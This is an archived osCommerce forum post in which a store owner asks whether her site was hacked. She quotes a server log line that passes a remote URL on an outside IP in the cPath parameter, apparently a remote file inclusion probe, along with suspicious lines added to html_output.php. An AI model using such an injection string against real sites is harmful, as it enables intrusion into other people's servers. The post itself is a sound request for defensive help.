Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Finding extra code in html_output.php


shopgrl

Recommended Posts

Posted

I have been finding this in my server logs: GET /osc/index.php?cPath=http://217.218.225.2:2082/index.html? HTTP/1.1" 200

 

When you added that to my site's full URL it leads to a TEST page. I found the image on that test page in my images folder on the server. My site is hosted by TechSquared out of Roanoke, VA. I never put that image there, so assume someone else did. That image was put on the server on a certain date, so I checked other pages on the server for that date and found that the html_output.php page in the Includes/Functions folder had been altered on the same date. So I compared that page to the original one and they are slightly different. The different code is:

 

if(!file_exists($src) && file_exists('../'.$src)){

copy('../'.$src, $src);

}

 

It comes right after this:

 

////

// The HTML image wrapper function

function tep_image($src, $alt = '', $width = '', $height = '', $parameters = '') {

if ( (empty($src) || ($src == DIR_WS_IMAGES)) && (IMAGE_REQUIRED == 'false') ) {

return false;

}

 

Can you tell me what that extra code is doing? Is this normal or has someone hacked the page?

 

I have blocked the IP 217.218.225.2 in htaccess. But I am still finding that type of posting all the time in my server logs with a variety of different initiating IPs. My concern is that whoever owns 217.218.225.2 (from Iran) is using my site for some nefarious purpose.

 

Thank you.

:huh:

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...